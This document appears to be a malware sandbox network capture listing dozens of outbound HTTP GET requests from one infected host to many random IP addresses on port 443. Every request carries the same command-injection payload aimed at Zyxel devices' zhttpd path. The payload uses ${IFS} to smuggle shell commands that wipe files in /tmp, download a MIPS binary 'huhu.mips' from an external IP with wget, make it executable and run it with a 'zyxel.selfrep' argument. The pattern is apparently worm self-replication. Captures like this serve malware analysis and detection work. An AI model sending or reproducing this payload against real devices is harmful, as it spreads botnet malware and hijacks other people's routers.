                                      Jan 19, 2024 17:28:57.339943886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      339192.168.2.145352493.238.171.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.339967966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      340192.168.2.143739467.135.55.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.339999914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      341192.168.2.1435222176.56.11.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340040922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      342192.168.2.1456814120.239.4.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340066910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      343192.168.2.145785037.223.20.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340127945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      344192.168.2.1432838145.153.26.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340159893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      345192.168.2.1434738108.12.14.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340162992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      346192.168.2.1441934160.13.236.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340162992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      347192.168.2.1441214115.156.229.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340162992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      348192.168.2.1456628110.66.141.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340205908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      349192.168.2.143713631.13.22.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340214968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      350192.168.2.143439612.21.243.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340292931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      351192.168.2.146031488.131.0.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340296030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      352192.168.2.1435098132.154.179.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340337992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      353192.168.2.1443288160.145.84.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340353012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      354192.168.2.145946461.122.119.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340398073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      355192.168.2.1435132152.46.15.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340401888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      356192.168.2.143576878.146.123.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340434074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      357192.168.2.1437624145.150.43.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340454102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      358192.168.2.1459692182.58.172.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340490103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      359192.168.2.1451066170.13.119.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340529919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      360192.168.2.145129696.61.233.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340553045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      361192.168.2.145725493.234.221.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340576887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      362192.168.2.1441890111.23.102.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340576887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      363192.168.2.143699290.172.63.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340607882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      364192.168.2.1457620173.189.39.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340636015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      365192.168.2.1439672216.248.218.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340667009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      366192.168.2.146083681.36.229.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340687990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      367192.168.2.1456042139.134.125.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340717077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      368192.168.2.1444124123.27.249.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340719938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      369192.168.2.145380038.247.202.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340780020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      370192.168.2.1433840125.52.11.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340791941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      371192.168.2.1460092157.25.45.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340817928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      372192.168.2.1434626143.218.178.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340842962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      373192.168.2.1441964158.11.230.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340882063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      374192.168.2.1434124202.54.102.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340886116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      375192.168.2.1457378185.151.16.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340925932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      376192.168.2.1444332201.231.76.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340959072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      377192.168.2.1452558188.2.163.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.340975046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      378192.168.2.14380365.114.201.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.341011047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      379192.168.2.143467873.115.165.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.341032028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      380192.168.2.143548020.226.194.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.341451883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      381192.168.2.1446336154.136.112.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.341551065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      382192.168.2.1455304175.1.236.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.341614008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      383192.168.2.145098472.155.69.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.341639996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      384192.168.2.143548639.134.174.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.341651917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      385192.168.2.144318417.21.172.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.341734886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      386192.168.2.1444780174.13.68.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.341757059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      387192.168.2.1457790109.43.48.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.341785908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      388192.168.2.145460262.14.253.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.341841936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      389192.168.2.143635664.193.78.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:58.345343113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      390192.168.2.1459126125.237.159.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:58.345391989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      391192.168.2.1442070190.83.21.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:58.345432043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      392192.168.2.1445514191.78.237.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:58.345488071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      393192.168.2.1450060121.55.126.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:59.348778009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      394192.168.2.143837259.177.7.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:59.348819017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      395192.168.2.1458676202.240.75.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:59.348885059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      396192.168.2.145818692.226.78.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:59.348913908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      397192.168.2.1454442148.93.229.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:00.353024006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      398192.168.2.145825866.94.25.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:00.353070021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      399192.168.2.1448736175.28.15.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:00.353100061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      400192.168.2.1458186156.0.102.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:00.353153944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      401192.168.2.1443740103.107.63.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:00.353214979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      402192.168.2.1453218109.118.175.36443
                                      TimestampBytes transferredDirectionData
